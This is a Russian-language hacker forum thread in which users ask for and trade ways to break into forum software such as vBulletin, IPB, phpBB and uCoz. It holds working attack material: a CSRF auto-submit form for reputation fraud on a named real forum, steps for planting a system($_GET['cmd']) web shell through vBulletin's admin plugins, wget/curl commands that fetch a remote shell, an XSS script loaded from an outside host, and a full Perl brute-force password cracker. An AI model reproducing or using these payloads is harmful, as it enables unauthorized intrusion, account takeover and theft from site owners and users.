http://forum.ru/modules.php?num=50-10
Выдает ошибку:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
Вот вопрос, это уже повод для проведения SQL инъекции?)

Привет
как узнать весию форума то есть что за форум это там стоит ?
http://www.funautomat.com
а лучше как свороват кукисы админа ли модератора ?

kirufka, ДА.

блин, оказалось $num это не к mysql запросу подставляется, а аргумент функции верни_стрелку_сцуко - mysql_fetch_array
Обидно а вот читал что в php-nuke есть дырка с cookie в параметре lang.
ну вот пытаюсь я выполнить фичу как на форуме описано, в cookie меняю lang на:
russian.php/../../admin/modules/authors
А мне сайт выдает такое вот при открытии просто index'ной страници к примеру:
Access Denied
Где у меня руки выкривились? :confused:

Вот у меня есть хеш пароля админа, как его можно расшифровать?? У меня есть прога passwordspro, какие для нее лучше взять словари? Какие есть еще способы расшифровки? Какой хеша на IPB 2.1.5?

есть он-лаин декодыры хеш-паролей.

Можешь дать ссылку? вроде тип пароля md5($pass.$salt) но я не уверен

Как взломать бесплатные форумы от mybb.ru ?

И так есть форум на IPB 2.3.5
там я нашол папку "convert"
когда я перешол в эту папку (то есть в строке браузера sait.ru/convert)
то там увидел что можно посмотреть путь к сайту (то есть D:\blabla\blabla\sait.ru\www)
логин и пароль к БД
Что это вообще такое?
Я потом порыскал в гугле и нашол что это какой то плагин IPB и связанное что то с SMF
сылка dev.russiangun.ru/convert/

помогите ! Вот видел на ачате пару скриптов на накрутки рейтингов на етом форуме.Но мне надо накрутить рейтинг на другом форуме там движок Bulletin® версия 3.7.2. ,я смотрел чего да как ,искал в инете но нечего неполучается.Подскажите кто чем может.
вот сам форум forum.travian.ru

legion64.zbord.org - какая тут версия ( и как вы определили )?
Как его можно взломать?

http://milw0rm.com/exploits/2696
Какая ошибка в этом эксплойте?

привет всем! хочу у вас спросить что такое эксплоит...и чем его кушать:)??

привет всем! хочу у вас спросить что такое эксплоит...и чем его кушать:)??
лучше его не кушать ))))))

а то сегментейщен фаулт будет в желудке или ооопссс (кёрнел паник)

У меня есть форум уязвимый к Backup SQL-Dump Bypass vBulletin 3.5.х
www.xz.com/forumpath/install/upgrade_301.php?step=backup
Можно ли с помощью данной уязвимости проделать какоето действие кроме копирования БД?

1)Имя сервера : Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.3 with Suhosin-Patch
время последней модификации : Sat, 20 Nov 2004 20:16:24 GMT
2)Сервер DNS поддерживает рекурсию запросов. При определенных обстоятельствах возможна DoS-атака на сервер.
3)Список форм:
POST /ucp.php?mode=login HTTP/1.1
username=&password=&autologin=&viewonline=&redirect=&sid=&login=
4)Известен Email (****@index.ru)
5)Список ссылок которые используют какие-либо параметры: /search.php?search_id=unanswered
/style.php?sid=&id=2&lang=en
/ucp.php?mode=login
6)Куки: 1. phpbb3_nvjt5_u=; expires=Sat, 12-Jan-2008 15:10:54 GMT; path=/; domain=legion64.zbord.org; HttpOnly
2. phpbb3_nvjt5_k=; expires=Sat, 12-Jan-2008 15:10:54 GMT; path=/; domain=legion64.zbord.org; HttpOnly
3. phpbb3_nvjt5_sid=; expires=Sat, 12-Jan-2008 15:10:54 GMT; path=/; domain=legion64.zbord.org; HttpOnly
7)кэширование : private, no-cache="set-cookie"
8)сертефикат SSL:
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
d3:f6:9d:cf:f8:6e:0e:51
Signature Algorithm: md5WithRSAEncryption
Issuer: C=XX, CN=B205.hosting.ua/emailAddress=root@B205.hosting.ua
Validity
Not Before: Jul 19 13:37:31 2007 GMT
Not After : Mar 27 13:37:31 2021 GMT
Subject: C=XX, CN=B205.hosting.ua/emailAddress=root@B205.hosting.ua
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:a4:d1:3c:49:ab:e9:08:51:ac:a7:19:ae:0f:c2:
ed:1c:90:84:4c:50:e0:e5:9f:d9:c7:1f:6c:29:e3:
48:e9:15:da:5d:ff:bc:5f:91:25:c5:22:66:bc:2e:
cd:6d:ee:df:c4:52:c4:e2:77:60:3f:0a:b1:d5:fc:
66:0c:fa:e6:db:aa:5d:04:11:a2:e8:d4:3c:0a:24:
f1:ad:0d:e7:0c:56:da:82:3c:4c:f3:08:4a:54:33:
d9:df:d0:76:5e:14:55:6a:93:f5:f2:e2:9a:86:26:
9b:d2:e4:03:21:4f:77:6c:2a:b4:78:39:27:cf:08:
f3:ff:32:94:fa:80:69:49:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Key Identifier:
AA:D8:D9:2B:9B:35:37:18:70:2E:A3:59:5F:FF:00:1A:95 :53:D5:B8
X509v3 Authority Key Identifier:
keyid:AA:D8:D9:2B:9B:35:37:18:70:2E:A3:59:5F:FF:00 :1A:95:53:D5:B8
DirName:/C=XX/CN=B205.hosting.ua/emailAddress=root@B205.hosting.ua
serial:D3:F6:9D:CF:F8:6E:0E:51

X509v3 Basic Constraints:
CA:TRUE
Signature Algorithm: md5WithRSAEncryption
2b:45:6d:80:04:c9:b5:7a:d6:b4:29:e2:25:71:ac:9e:bd :24:
0b:9c:24:1c:5f:5f:55:1f:64:de:8e:14:3e:ad:1d:6f:2d :b1:
65:0e:06:68:9a:f1:24:e3:4f:08:c3:da:b6:58:d8:3f:7f :99:
e1:5e:31:76:42:b8:40:8b:d2:24:18:d2:aa:92:f6:0f:f9 :61:
bf:37:e5:d2:7e:dc:4c:f2:c0:13:8a:92:ae:cb:06:c2:f7 :07:
c3:bc:1b:de:20:01:b9:19:57:06:fa:e9:74:1d:e9:2e:02 :ad:
6b:8e:b6:d6:99:a8:b3:9e:7a:99:19:be:c7:75:64:2f:d1 :e4:
28:23
9) Информация SSL:
Версия : TLSv1
Cipher : DHE-RSA-AES256-SHA
Имя : B205.hosting.ua

Есть ли тут хоть что-то полезное? Помогите взломать форум!

Есть ли тут хоть что-то полезное, помогите взломать форум!
Нет тут ничего полезного, кроме как, судя по кукам 3 версия(и то это легко поделываеться в админпанели).

если возможность накрутить репу на форуме с движком vBulletin® версия 3.7.2. Может есть возможность репу поднять через багу или может скрипт какой есть ,подскажите кто чем может .
вот урла на сам форум http://forum.travian.ru

если возможность накрутить репу на форуме с движком vBulletin® версия 3.7.2. Может есть возможность репу поднять через багу или может скрипт какой есть ,подскажите кто чем может .
вот урла на сам форум http://forum.travian.ru

Трава зло! Бросай ее! =)

Если готов платить, стучи в асю (в профиле), попробуем. В случае успеха 1$ = 1 репа.

Трава зло! Бросай ее! =)

Если готов платить, стучи в асю (в профиле), попробуем. В случае успеха 1$ = 1 репа.

Ну емаё скоро на любые вопросы пользователей будет 2 ответа

1. иди погугли
2.если готов платить то пиши мне

Ну емаё скоро на любые вопросы пользователей будет 2 ответа

1. иди погугли
2.если готов платить то пиши мне

Если бы это можно было описать в двух словах я бы написал, но тут все не так просто. Могу предложить почитать про CSRF-inj.
;)

ну объясни по асе как можешь ,если у ми получится накручивать рупу самому на том форуме ,то я те лаве дам чуть-чуть и буду очень сильно благодарен ,ты мне объясни токо принцып и ка ето делать

Я вспомнил что на ачате видел статью, где на примере опять же ачата чувак объяснял как можно это сделать. Поищи в статьях, если бы я знал точное решение я бы сразу сказал, нужно искать, пробовать, пытаться =)

да я ету статью читал ,но там версии движков форумов разные и нечего невыйдет на форуме травы ,ну покрайнемере невышло у меня

ну дак что

2 waik
берешь в руки сниффер(Naviscope, в FF есть плагин Tamper Data и т.п.) и идешь на форум, где ты хочешь репу накрутить. Если есть возможность добавить кому-нибудь репу, добавляешь, отлавливаешь пакет и разбираешься в нем, какие параметры передаются... Потом создаешь скрипт, перебрасывающий юзера на форму добавления репы с нужными параметрами, заливаешь куда-нить, спамишь юзеров форума этим линком...

P.S.
Есть конечно несколько нюансов, которые могут помешать(проверка реферера, метод передачи...) осуществить данный вариант накрутки, но мне почему то кажется, что обойдется без них... =)

P.S.S
Еще могут просечь фишку твою и забанить... =(
CSRF

я так делал ,проверки рефера там нету вроде,но я так накрутил может где-то 3 ,мне интересно про какой нить другой способ без заманивания пользователей на ссылки,фейки и.т.д
у меня был примерно такой вот скрипт


<body onload="p.submit()">
<form action="http://forum.travian.ru/view_reputation.php" method="post" id="p">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Всё ясно спс >(">
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="мой id здесь стоит "/>

Iceangel_ - Спасибо что ответил по теме

Всех приветствую.

"Курочил" один ресурс, наткнулся на логин:пасс админа от phpBB 2.0.23.
Сам с форумами дело не имел по этому сильно не пинайте.
Вопрос:
Возможно ли залить шелл через админку форума?
Если, ДА, то отпишите каким образом.

Благодарю!

Привет.

Ищу шэлл или сплоит для булки 3.7.2

Есть пароль от администратора, но у него есть доступ только к модерки.

Цель: слить базу данных любым способом :o


Заранее спасибо!

у админа по идее должен быть доступ к админке :)
там внизу есть функция сохранить базу ( в админке)

В смысле в булке есть 2 типа админов. Супер-админ и простой.

Может этот даже и супер админ, но ссылка на админку скрыта, и плавает у них в голове. А при нажатии "Управление" - написано not found у них.

Octave_Paran
http://forum.antichat.ru/showpost.php?p=198446&postcount=2 все способы походу )))

вопрос:
Есть способ залить шелл или сделать mysql-inj через форум IPB 2.3.6?
пробовал: act=xmlout&do=check-display-name&name=%2527 в ответ гордое "notfound"
на форуме нет доступа ни к админке ни к модерскому разделу.
также на сервере стоит скрипт aowow (http://wowjp.ru/news/2008-06-01-292) может кто с ним сталкивался - может через него удастся залить. :(

вопрос:
Есть способ залить шелл или сделать mysql-inj через форум IPB 2.3.6?
пробовал: act=xmlout&do=check-display-name&name=%2527 в ответ гордое "notfound"
на форуме нет доступа ни к админке ни к модерскому разделу.
также на сервере стоит скрипт aowow (http://wowjp.ru/news/2008-06-01-292) может кто с ним сталкивался - может через него удастся залить. :(
Если notfound- форум не уязвим...и насколько я помню..скуль эта до 2.3.5 ...под 2.3.6 или нету..или в привате ...
ты бы ссылку кинул...в раздел просьбы о взломах

подскажите XSS уязвимость сайта ucoz! привязки к ip на данном сайте нету

Может кто нибудь подсказать стоит ли мне ковырять это форум дальше http://forum.all-wap.com
Вообщем пока единственно действующий способ это СИ,ФЕЙК и пока все что я нашел рабочее!(ну это в принципе применимо везде)Проверил почти все переменные передающиеся методом ГЕТ на фильтрацию!Так же проверил некоторые передающиеся методом ПОСТ.Нашел активную хсс но чтоб ее заюзать нужны права админа!И в какой то момент мне показалось все дело в шляпе но это было не так скуль инъекция не прошла!CSRF тоже не проходит,почти во всех функциях сайта участвует переменая сид которая отвечает за сессию!Есть вариант попробывать залить картинку в формате гиф с прописаным в ней ява скриптом!(можете подсказать какой прогой это проделать?В хекс деракторе все выделяю и добавляю комент и нифига!Что это фильтрация или нет?)!Есть вариант передать что либо в хтмл заголовках!(хотя в этом сильно сомневаюсь что что выйдет из этого)!У меня есть исходники на руках!Слышал что можна обойти фильтрацию переменной переполнением буфера обмена!Можете подсказать где почитать?В гуглах смотрел но не удачно!

Народ а что на smf уязвимостей нету чтоли ??? :)

Народ а что на smf уязвимостей нету чтоли ??? :)
http://milw0rm.com/related.php?program=Simple%20Machines%20Forum

Мне на одном сайте укоза поставили в репутации минус =)
Фишка в том, что минус поставил препод по программированию)
Очень хочеться получить доступ и изменить его мнение обо мне :D
Поэтому вопрос: работают ли сейчас какие способы на укозе?
Юзал поиск - ничего конретного/рабочего не нашёл =\

Очень хочеться получить доступ и изменить его мнение обо мне
Ты его уже не изменишь, либо

Юзал поиск - ничего конретного/рабочего не нашёл =\
Юзай еще!

Поэтому вопрос: работают ли сейчас какие способы на укозе?
Да.

mailbrush, почитал комменты в твоей репе, всё стало понятно...
процитирую
"Нде... Если не знаешь че сказать, лутше уж помолчи!"
по ответу: лол

вообщем права админа есть, но испробовал 5 разных способов заливки shell увы... (((
вообще, цель заливки шелла - сосед )))

а с формумом вообще веселость по 2 проверкам показывает что он 2.0.4, но зайдя в админку видишщь копирайт 2.0.21 )))

вообщем я готов компенксировать в меру своих слабых человеческих возможностей время на хелп.
ICQ 220247943

на поиск ссылаться не нужно, статьи просмотрены, способы разные испытаны, но.....но увы))))

гы, складываеться впечатление что проще купить хостинг там же и через свой акк полазить ))) что не есть айс конечно

У меня стоит PHPbb 3.0.4 не получается утсановить мод для отправки быстрого сообщения ! Кто знает отпишитесь !
Стиль не стандартный - в этом и проблема ! С меня много +++

Ребята, подскажите плиз сайт (или несколько) со следующими уязвимостями:
- Cross Site Scripting (XSS)
- SQL injection

Необходимо для тестирования написанного мной сканера уязвимостей (для дипломной работы)

Всем спасибо за ответы!

- SQL injection
https://forum.antichat.ru/lastpostinthread21336.html
- Cross Site Scripting (XSS)
https://forum.antichat.ru/lastpostinthread35802.html

Подскажите что можно сделать с
[-] Attacking code link recovery...

[+] New SESSION Detected: PHPSESSID=ho60rit4hppijqriot47h464k5; path=/; domain=.
*******.com
[+] Testing Code: xulr6f70st

Блин ucoz не уязвим?
Подскажите плз хоть какую-нбудь уязвимоть!
Можно в ЛС!

Всем привет! Есть форум vBulletin 3.5.4, как его хакнуть? Нужны админские права.

народ есть хешь пароля и соль, от пользоватилей но сбрутить ни как не могу, может есть какой нить альтернативный вариант использования хеша и соли или добычи пасса админа...

точно немогу сказать, так как не пользовал мубэбэ, но посмотри алгоритм создания куки, возможно есть вариант подделать

Народ подскажите пожалуйста как взломать форум IPB 2.3.5?
Нужно узнать пароль админа

Народ подскажите пожалуйста как взломать форум IPB 2.3.5?
Нужно узнать пароль админа
http://milw0rm.com/exploits/6507 <= 2.3.5 Remote SQL Injection Exploit
http://milw0rm.com/exploits/6325 <= 2.3.5 Multiple Vulnerabilities Exploit (revised)

Нужно узнать пароль админа! двиг булка 3.7.3 .
PS: C меня плюсы ;)
PSS: папка install не удалена! Мало ли...

И как раскрыть путь в булке 3.7.3 ?

Нужно узнать пароль админа! двиг булка 3.7.3 .
PS: C меня плюсы ;)
PSS: папка install не удалена! Мало ли...
http://www.hackzone.ru/exploit/view/id/3249/

http://www.hackzone.ru/exploit/view/id/3249/

А как пользоваться? Я новичёк в этом и нужно учиться :p

А как пользоваться? Я новичёк в этом и нужно учиться :p
:/ там есть описание:
Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
with the visitor messages addon (a clone of a social network wall/comment area).
When posting XSS, the data is run through htmlentities(); before being displayed
to the general public/forum members. However, when posting a new message,
a new notification is sent to the commentee. The commenter posts a XSS vector such as
<script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
and I have included an example worm that makes the user post a new thread with your own
specified subject and message.

- Описание = критическая уязвимость существует в новых Справка 3.7.3 программное обеспечение, которое поставляется включен
с посетителем сообщений аддон (клон социальной сети стены / комментарий область).
При публикации XSS, данные проходят через htmlentities (); затем отображается
для широкой публики / участники форума. Однако, при отправке нового сообщения
новое уведомление направляется commentee. Комментатор должности XSS вектор таких, как
<script src="http://evilsite.com/nbd.js">, и когда commentee посещений usercp.php
в рамках домена, они били нефильтрованное XSS приложу. XSRF также легко доступны
и я включил пример червя, что позволяет пользователю создать новое нить с вашими собственными
указанной темы и сообщения.
Вот какой перевод получился , обьясни в крадце пожалуйста :)
C меня плюсы :)

пихаешь сплоит в evil.js и льешь к себе на hack.com пишешь пост и цепляешь яваскрипт <script src=http://hack.com/evil.js>

Создал файл , закинул туда сплоит и написать в теме пост с <script src=мой домен/evil.js>
А дальше что?

IPB (U) v1.3 Final пропатченный!! Чем можно ломануть????
r57ipb2 - не предлогать)

здравствуйте !
вот этот код
Код: IPB <-2.3.3. [img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*] Found by XenOtai from Veronal H2S Team. Работает в IE и Mozille.
работает на неком форуме IPB 2.3.3, появляется окно предупреждения "hack"
есть ли какое-нибудь практические применение у этого кода, кроме как пугать посетителей :D ?
еше есть вопрос -
предыстория - на форуме IPB 2.3.3 мне нужно удалить свои темы, у пользователей такой возможности нет (на просьбы администраторы-модераторы не реагируют(правда, один раз ответили, в не очень вежливой форме :mad: )
вопрос - какие способы есть, чтобы заполучить права на удаление тем ? (лучше бы попроще :o ) Я пакостить в форуме совсем не хочу, полезный он, нужно только удалить темы.

это активная xss, о спосабах применения этой баги читай в разделе статьи!! права на удление проще всего получить поимев акк админа ;-)

читаю, если правильно поняла, то активная xss помогает стащить куки, только не понятно мне, как же куки утащить и где их потом искать
если это поможет завладеть админскими правами :confused:

дата время
IP: ******* (whois) Real IP*: ************
QUERY: пусто
REFERER: http://*************
AGENT: сведения осистеме

1. что такое QUERY ?
2. из кодов, приведенных на сайте со сниффером, работает один c bb-кодами, c javascript - нет
из этой статьи http://old.antichat.ru/txt/IPB/ код с Video не работает (подопытный форум не поддерживает этот тег)
пробовала заменить на другие типа имг - :eek: данные снифферу не передает, а страница какая-то закореженная становится
в каком направлении теперь рыть ?

может с этим что нужно сделать [img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*]

где хранятся открытые пароли админов в vbulletin

где хранятся открытые пароли админов в vbulletin
В открытом их нету в vBulletin.
Алгоритм шифрования md5(md5($pass).$salt).
Таблица user колонки password,salt.

xMSAx можно слить пароли
как это сделать читай в разделе Vbulletin уязвимости там есть

какой есть phpbb 3 ненужный php файл который можн заменить на шелл?

какой есть phpbb 3 ненужный php файл который можн заменить на шелл?
ненужных файлов в cms не бывает
а что тебе мешает создать свой, замаскировав его под местность?

ну новый часто не выполняется,прав чтоли не хватает,а если заменить то все ок

Был удивлён, что про это ещё не писали.. Т.е. я ща спалю приват-фишку =) Идём на фрихост, смело регимся там, заливаем шелл на фтп. Ищем по всем ресурсам файлы с расширением ......
Источник: www.antichat.ru

Не подскажите где поподробней прочитать про этот метод поиска файлов на хосте?

я зарегился на фрихосте,залил шелл к себе на хост,запускаю в нем поиск, как описано выше, ищет только у меня на ресурсе. Как сделать поиск определенного файла по всем ресурсам хоста? Что я делаю не так?
P.S.у файлов которые нужно найти права доступа 777 или 755 и они точно находятся гдето на том же хосте где и мой ресурс,

извините , если этот вопрос уже когда то задавали...

Сколько времени уходит у знающего человека (мастера) на вскрытие пароля админа на старых форумах IPB ,форумах без всяких там особенных защит и серьезных людей ?

извините , если этот вопрос уже когда то задавали...

Сколько времени уходит у знающего человека (мастера) на вскрытие пароля админа на старых форумах IPB ,форумах без всяких там особенных защит и серьезных людей ?


Времени по разному может уходить. Никогда нельзя сказать точно. Смотря какой форум, какие там есть известные баги и сматря какое умственное развитие у руководства форума

ipb(u) 1.3.1 final
Подскажите как пользоваться этим:
index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=-1
И чем полезно может быть это:
index.php?act=calendar&code=birthdays&y[]=2009&m=3&d=2 (выставляет отрицательные значения года)
[] - из-за частых ошибок php-скриптов с помощью подстановки [] можно узнать реальный путь к серверу

А для скули можно как нибудь использывать?
И ещё что это даёт когда знаеш путь к серверу? как это использовать? напиши если не трудно. :)

Конечно можно! Чтобы залить шелл, надо знать этот самый реальный путь =)

есть ли работающие уязвимости на SMF 1.1.5 позволяющие узнать куки или пароль админа?

Здравствуйте !!!
Какой на данный момент какой самый безопасный форум ? не важно платный либо бесплатный , желательно также с авто обновлением !!!
что думаете о ipb последней версии?

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда


Как через этот шел залить файл на сервер???

www.xz.сom/forumpath/faq.php?cmd=wget http://site.com/shell.txt -O shell.php
or
www.xz.сom/forumpath/faq.php?cmd=curl http://site.com/shell.txt > shell.php
or
www.xz.сom/forumpath/faq.php?cmd=fetch http://site.com/shell.txt -o shell.php

www.xz.сom/forumpath/faq.php?cmd=wget http://site.com/shell.txt -O shell.php
or
www.xz.сom/forumpath/faq.php?cmd=curl http://site.com/shell.txt > shell.php
or
www.xz.сom/forumpath/faq.php?cmd=fetch http://site.com/shell.txt -o shell.php


Косяк...

Файл создается на сервере, но пустой, как туда код то запихнуть???

и еще

на сервере включен
allow_url_fopen On On

если это вставить
<? include('http://путь_к_шеллу_.php') ?>

что будет??? как вызвать сам шелл

Приветствую всех, есть флудер для форумов Вблювотень ?
Есть один форумчик без лимита по времени для отправки мессаг.
Нужно немного пофлудить)

Халявных ниразу не видил, только комерческие...

Приветствую. Какие уязвимости, кроме описанных на официальном сайте, есть в InstantCMS ? Благодарю за ответы.

помогите плз определить какой єто движок? http://la2titan.ru/forum/

EP']помогите плз определить какой єто движок? http://la2titan.ru/forum/


vBulletin® v3.6.8


__http://la2titan.ru/forum/archive/index.php

Можно ли слить себе бд юзерс с форума minibb зная админский пасс?

Скажите пожалуйста что ЭТО (http://www.buxbb.com) за версия IPB?

+ в репутацию

Известны ли кому уязвимости Invision Power Board ver. 2.3.6, пока вроде непрошибаемый форум?

У меня почемуто в Linux r57ipb216gui.pl сплоит прорисовывается криво, надписи не соответствуют полям, отсутсвует одна кнопка, что это может быть? И еще: объясните значения полей и таблиц выдираемых этим сплоитом.
Спасибо.

Захотелось взломать один форум...Версия форума vBulletin 3.7.2
Как можно получить доступ к админке ?

Привет всем! Я абсолютный чайник в этом деле! Много читал постов на эту тему, но ничего не нашел для PHPBB версии 2.0.22 и выше.
Если кому не скучно и не нудно прошу объясните!
А если быть чеснее, конечно, нужен хэш для того чтоб расколдовать админа
Спасибо!

Здравствуйте. Мне хотелось бы увидеть находящееся на одном форуме под хайдом. Я решил попробовать использовать эксплоиты. На https://forum.antichat.ru/threadnav22852-6-10.html да и на других сайтах, например http://www.milw0rm.com/exploits/7174 или http://securityvulns.ru/Udocument391.html есть эксплоиты, но объяснений ровно 0 :( Подскажите пожалуйста, куда пихать этот код, какие параметры как заполнять.. и, если не сложно, что добавить, чтоб узнать пасс от чьего-нибудь акка или просто просмотреть хайд :)

ЗЫ ботский пост получился, но я не бот, нормальное объяснение пойму. Просто первый раз имею дело с эксплоитами.

Здравствуйте. Мне хотелось бы увидеть находящееся на одном форуме под хайдом. Я решил попробовать использовать эксплоиты. На https://forum.antichat.ru/threadnav22852-6-10.html да и на других сайтах, например http://www.milw0rm.com/exploits/7174 или http://securityvulns.ru/Udocument391.html есть эксплоиты, но объяснений ровно 0 :( Подскажите пожалуйста, куда пихать этот код, какие параметры как заполнять.. и, если не сложно, что добавить, чтоб узнать пасс от чьего-нибудь акка или просто просмотреть хайд :)

ЗЫ ботский пост получился, но я не бот, нормальное объяснение пойму. Просто первый раз имею дело с эксплоитами.
сначала определи версию движка, а потом учитывая версию ищи под него сплоит, если такой найдется, то почитай руководство к использованию, того на чем написан сплоит, обычно php или perl

народ, а на сколько безопасен форум смф?

люди, существует вообще брут аков с булки? если да, то чирканите плз

люди, существует вообще брут аков с булки? если да, то чирканите плз
Да)
#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);

$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars

print q(

################################################## #########
# vBulletin brute forcer #
# http://www.unnamedone.com #
# brian_denys@hotmail.com #
# 09 - April - 2008 #
################## Coded By UnnamedOne ####################

);

if (@ARGV < 4)

{

print " # Я не отвечаю за что-нибудь, что вы удовлетворяетесь с этим!\n";
print " # Тестировалось только версиях vBulletin 3.6.8 and 3.7.0!\n";
print " # usage : vbrute.pl [host & path] [user] [pass] [target]\n";
print " # E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";

exit();

}

fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
crack($t);
}

sub fakelogin {
$xplr = LWP::UserAgent->new() or die;
$cookie_jarr = HTTP::Cookies->new();
$xplr->cookie_jar( $cookie_jarr );
$resr = $xplr->post($url.'login.php?do=login',
Content => [
"vb_login_username" => "$usern",
"vb_login_password" => "$passw",
"do" => "login",
],);
if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
#Do nothing..
}

else

{
#print $cookie_jarr->as_string;
print "Forum not vulnerable or wrong username / password.\n";
exit();

}

}

sub crack {

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++) {
$RawString[i] = 0;
}
$Start = gettimeofday();
do {
for (my $i =0;$i<$CharSet;$i++)
{
if ($RawString[$i] > length($alpha)-1) {
if ($i==$CharSet-1) {
$cnt = 0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret = "";
for (my $i =0;$i<$CharSet;$i++) {
$ret = $ret . substr($alpha,$RawString[$i],1);
}
$count++;
if($count == 4) {
fakelogin();
$count = 0;
}
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'login.php?do=login',
Content => [

"vb_login_username" => "$uname",
"vb_login_password" => "$ret",
"do" => "login",

],);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr) {
$cnt = int($cnt/$dbgtmr);
$Start = gettimeofday();

}

$logins++;
system("clear");
$pro = ($logins / ($charcount * $maxchars));
print "Current password: $ret\n";
print "Login attempts: $logins\n";
print "Cracking speed: $cnt passwords/sec\n";
print "$pro% finished.\n";

$cnt = 0;

if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
print "Password cracked! => $ret\n";
exit();
}

$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));

}

пасиб, щас попробую с ним разобратся ещё

всё, разобрался))

А разве на булке нет ограничения неправильных вводов пароля?

И куда этот код пихать? В компилятор perl? Или заливать на хостинг с поддержкой перла?

кто разбирается в форумах пхпбб отпишите 459902747

Ребята, скажите где можно скачать vBulletin 3.5.3? чтоб можно было его поюзать, посмотреть исходники?
vBulletin.com не предлагать, там реитсрация нужна и покупка лицензии.

Возник вопрос с чемодом. Плохо разбираюсь. После заливки шелла пытаюсь поменять права на доступ, но постоянно выдаёт ошибку. Если и могу изменить, то только в "меньшую" сторону. Подскажите, может что не так делаю? В madShell отмечаю файл(папку) и выбираю чемод, выставляю нужные мне права, но после нажатия кнопки сохранить вылетает ошибка.

Возник вопрос с чемодом. Плохо разбираюсь. После заливки шелла пытаюсь поменять права на доступ, но постоянно выдаёт ошибку. Если и могу изменить, то только в "меньшую" сторону. Подскажите, может что не так делаю? В madShell отмечаю файл(папку) и выбираю чемод, выставляю нужные мне права, но после нажатия кнопки сохранить вылетает ошибка.
Ну у тебя прав нету..чтобы изменить чмод на данную папку.)..
Ну или..что за ошибка?)

Ну у тебя прав нету..чтобы изменить чмод на данную папку.)..
Ну или..что за ошибка?)
Именно, он и выдает что не зватает персимисинов =) 99% серваков закрыто, но попадаются... А никак нельзя обойти?
И ещё может кто сталкивался с такой проблемой: открываю sql-базу, прописываю себя админом, но когда пытаюсь зайти- эта сволочь не пускает. Приходится менять наст.админу пасс, заходить в админку и вставлять в ему пароль обратно, в базу.
так вот, когда захожу, то в пользователях вижу свой ник(который залил) с правами супер.админа, но войти под-своими данными всё равно не могу. Не слишком путанно объяснил?

Именно, он и выдает что не зватает персимисинов =) 99% серваков закрыто, но попадаются... А никак нельзя обойти?
И ещё может кто сталкивался с такой проблемой: открываю sql-базу, прописываю себя админом, но когда пытаюсь зайти- эта сволочь не пускает. Приходится менять наст.админу пасс, заходить в админку и вставлять в ему пароль обратно, в базу.
так вот, когда захожу, то в пользователях вижу свой ник(который залил) с правами супер.админа, но войти под-своими данными всё равно не могу. Не слишком путанно объяснил?
Обойти...м..ну разве что получить root'a или ftp доступ...(ну или ssh акк юзера с правами)
Насчёт админа...а ты не думал что где то в конфигах(не в базе) прописан ник/id администраторов?(типа дополнительная защита)...что за движок?....

Сорри за ап вопроса. Скажите где можно скачать vBulletin 3.5.3?
vBulletin.com не предлагать, там реитсрация нужна и покупка лицензии.

Обойти...м..ну разве что получить root'a или ftp доступ...(ну или ssh акк юзера с правами)
Насчёт админа...а ты не думал что где то в конфигах(не в базе) прописан ник/id администраторов?(типа дополнительная защита)...что за движок?....
Пробовал на joomla и wp везде одна х... Ставлю на денвере заношу юзера через админку, потом захожу в базу копирую данные в базу "жертвы" и ничего. Говорит нет такого пользователя, иногда вылетает что нет прав и т.д. Поэтому, как сказал, приходится изъё...ся менять админу пасс через базу, заходить в панель и быстренько, пока не спалился, восстанавливать пароль обратно- доступ я уже получил поэтому не выкинет =) Сейчас попробовал на двух хостах это проделать- не пускает, а с настоящей админской записью- но с новым паролем свободно. В чём может быть проблема? Уже весь двиг с базой излазил- не пойму никак....С ftp мало когда получается, мало кто добавляет фтп-доступ в конфиг при установке кмс.

Сорри за ап вопроса. Скажите где можно скачать vBulletin 3.5.3?
vBulletin.com не предлагать, там реитсрация нужна и покупка лицензии.
